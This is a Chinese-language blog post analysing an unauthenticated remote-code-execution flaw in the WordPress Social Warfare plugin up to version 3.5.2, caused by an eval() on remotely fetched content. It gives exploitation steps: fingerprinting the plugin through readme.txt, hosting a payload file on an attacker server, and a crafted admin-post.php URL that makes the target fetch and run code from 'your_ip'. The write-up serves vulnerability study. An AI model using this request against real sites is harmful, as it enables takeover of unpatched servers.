3 月 21 日插件作者紧急发布了 3.5.3 版本以修复高危的 RCE 漏
洞,在<=3.5.2 版本中存在一处无需登录即可 getshell 的 RCE 漏洞。
漏洞分析
在/wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php
文件中有一处 eval()函数,该函数将 file_get_contents() 读取的文件内容当做 PHP 代码执行,导致 RCE。
漏洞利用
1、刺探是否安装了 Social Warfare 插件
访问http://127.0.0.1/wp-content/plugins/social-warfare/read
me.txt,如果存在 readme.txt 文件则说明已经安装该插件,并且从
该 txt 文件中可获知插件的版本。我的本机环境为 3.5.2 版本。
2、在自己的 VPS 服务器上放置一个 code.txt 文件,并启动 HTTP 服 务器使该文件可通过 HTTP 访问。文件内容如下:
3、在未登陆任何账号的情况下直接访问如下链接即可 getshell。 http://127.0.0.1//wp-admin/admin-post.php?swp_debug=load_op tions&swp_url=http://your_ip/code.txt&wpaa=phpinfo();
本文作者为Mr.Wu,转载请注明,尊守博主劳动成果!
由于经常折腾代码,可能会导致个别文章内容显示错位或者别的 BUG 影响阅读; 如发现请在该文章下留言告知于我,thank you !